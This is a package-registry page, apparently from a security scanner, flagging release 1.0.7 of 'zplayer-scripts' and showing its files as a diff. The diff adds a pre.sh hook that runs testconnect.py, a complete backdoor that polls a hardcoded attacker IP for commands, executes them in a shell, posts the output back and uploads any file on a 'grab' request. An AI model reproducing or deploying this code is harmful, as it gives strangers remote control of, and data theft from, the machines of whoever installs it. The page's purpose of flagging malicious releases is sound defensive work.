zplayer-scripts 1.0.7
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of zplayer-scripts might be problematic. Click here for more details.
- package/README.md +1 -0
- package/package.json +14 -0
- package/pre.sh +1 -0
- package/testconnect.py +53 -0
package/README.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
Owned by ZSEC
|
package/package.json
ADDED
package/pre.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
python3 testconnect.py
|
package/testconnect.py
ADDED
@@ -0,0 +1,53 @@
|
|
1
|
+
#python3
|
2
|
+
|
3
|
+
from urllib import request, parse
|
4
|
+
import subprocess
|
5
|
+
import time
|
6
|
+
import os
|
7
|
+
|
8
|
+
ATTACKER_IP = '34.133.45.72' # change this to the attacker's IP address
|
9
|
+
ATTACKER_PORT = 80
|
10
|
+
|
11
|
+
# Data is a dict
|
12
|
+
def send_post(data, url=f'http://{ATTACKER_IP}:{ATTACKER_PORT}'):
|
13
|
+
data = {"rfile": data}
|
14
|
+
data = parse.urlencode(data).encode()
|
15
|
+
req = request.Request(url, data=data)
|
16
|
+
request.urlopen(req) # send request
|
17
|
+
|
18
|
+
|
19
|
+
def send_file(command):
|
20
|
+
try:
|
21
|
+
grab, path = command.strip().split(' ')
|
22
|
+
except ValueError:
|
23
|
+
send_post("[-] Invalid grab command (maybe multiple spaces)")
|
24
|
+
return
|
25
|
+
|
26
|
+
if not os.path.exists(path):
|
27
|
+
send_post("[-] Not able to find the file")
|
28
|
+
return
|
29
|
+
|
30
|
+
store_url = f'http://{ATTACKER_IP}:{ATTACKER_PORT}/store' # Posts to /store
|
31
|
+
with open(path, 'rb') as fp:
|
32
|
+
send_post(fp.read(), url=store_url)
|
33
|
+
|
34
|
+
|
35
|
+
def run_command(command):
|
36
|
+
CMD = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
|
37
|
+
send_post(CMD.stdout.read())
|
38
|
+
send_post(CMD.stderr.read())
|
39
|
+
|
40
|
+
|
41
|
+
while True:
|
42
|
+
command = request.urlopen(f"http://{ATTACKER_IP}:{ATTACKER_PORT}").read().decode()
|
43
|
+
|
44
|
+
if 'terminate' in command:
|
45
|
+
break
|
46
|
+
|
47
|
+
# Send file
|
48
|
+
if 'grab' in command:
|
49
|
+
send_file(command)
|
50
|
+
continue
|
51
|
+
|
52
|
+
run_command(command)
|
53
|
+
time.sleep(1)
|